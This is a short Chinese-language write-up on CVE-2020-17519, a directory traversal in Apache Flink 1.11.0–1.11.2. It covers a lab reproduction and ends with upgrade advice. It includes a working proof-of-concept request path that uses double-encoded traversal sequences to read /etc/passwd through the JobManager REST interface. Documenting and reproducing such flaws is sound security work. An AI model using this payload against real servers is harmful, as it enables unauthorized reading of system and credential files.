Apache Flink jobmanager/logs 目录穿越漏洞
1、漏洞描述
Apache Flink 是一个开源流处理框架,具有强大的流处理和批处理能力
Apache Flink 1.11.0 中引入的一项更改(也在 1.11.1 和 1.11.2 中发布)允许攻击者通过 JobManager 进程的 REST 接口读取 JobManager 本地文件系统上的任何文件
2、漏洞影响范围:
Apache Flink 1.11.0、Apache Flink 1.11.1、Apache Flink 1.11.2
3、漏洞复现:
环境:
kali:192.168.4.157
ubuntu:192.168.4.128
docker
http://192.168.4.128:8081
POC: /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
参考资料:
- https://github.com/apache/flink/commit/b561010b0ee741543c3953306037f00d7a9f0801
- https://nvd.nist.gov/vuln/detail/CVE-2020-17519
4、修复建议:
升级Flink版本至1.11.3及以上